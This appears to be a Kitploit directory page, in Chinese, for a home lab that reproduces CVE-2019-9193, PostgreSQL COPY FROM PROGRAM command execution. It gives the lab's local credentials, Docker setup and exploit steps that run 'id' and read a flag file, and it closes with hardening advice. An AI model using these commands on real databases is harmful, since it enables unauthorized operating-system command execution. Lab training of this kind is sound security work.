Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-9193-Home-Lab — 该实验室模拟了CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE | Kitploit
工具/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
漏洞分析漏洞利用渗透测试学习与教育数据库安全实验室与实践
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

该实验室模拟了CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE

查看仓库
29个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

本实验室模拟 CVE-2019-9193,这是一个 PostgreSQL 9.3–11.2 版本中的漏洞,允许:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

当超级用户或拥有 pg_execute_server_program 角色的用户执行时,可以运行操作系统命令。

你的任务是利用此功能读取:

root@kitploit:~
/tmp/flag.txt

目标

  1. 连接到 PostgreSQL:
    • 用户:postgres
    • 密码:sentinel7
    • 主机端口:5433
  2. 使用 COPY FROM PROGRAM :
    • 执行操作系统命令
    • 获取 flag

开始

root@kitploit:~
docker compose build
docker compose up -d

通过以下方式连接:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

漏洞利用

1) 创建表

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) 测试 RCE

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) 读取 flag

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

安全建议

  • 切勿使用 PostgreSQL 超级用户运行应用程序
  • 非必要不授予 pg_execute_server_program 角色
  • 禁用或限制 COPY PROGRAM 功能
  • 强化应用程序抵御 SQL 注入
下载工具